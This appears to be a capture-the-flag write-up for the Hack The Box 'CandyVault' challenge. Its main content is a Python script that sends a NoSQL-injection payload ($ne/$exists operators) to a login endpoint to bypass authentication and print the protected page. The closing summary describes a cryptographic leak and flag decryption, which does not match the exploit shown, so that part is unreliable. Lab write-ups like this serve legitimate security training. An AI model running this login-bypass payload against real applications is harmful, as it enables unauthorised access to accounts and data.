https://app.hackthebox.com/challenges/624

Description

The malevolent spirits have concealed all the Halloween treats within their secret vault, and it’s imperative that you decipher its enigmatic seal to reclaim the candy before the spooky night arrives.

Exploitation

#!/usr/bin/python3
from requests.exceptions import ConnectionError
import requests,json,sys

def get_base_url():
    if len(sys.argv)!=2:
        print(f"Usage: {sys.argv[0]} <ip:port>")
        sys.exit(1)
    host,port=sys.argv[1].split(':')
    return f"http://{host}:{port}"

def attempt_login(payload):
    for _ in range(3):
        try:
            response=session.post(login_url,headers=headers,json=payload,allow_redirects=False)
            if response.is_redirect:
                final_url=response.headers.get("Location")
                if final_url.startswith("/"):final_url=base_url+final_url
                response=session.get(final_url,headers=headers)
                return response,final_url
            return response,None
        except ConnectionError:pass
    return None,None

def attack():
    for payload in payloads:
        response,final_url=attempt_login(payload)
        if response and "Log-in to open the doors to candy vault!" not in response.text:
            print(response.text);return
        
base_url=get_base_url()
login_url=f"{base_url}/login"
headers={"Content-Type":"application/json","User-Agent":"Mozilla/5.0"}
session=requests.Session();payloads=[{"email":{"$ne":None},"password":{"$exists":True}}]
attack()

Summary

CandyVault: model the crypto leak, recover the missing secret, and decrypt the flag.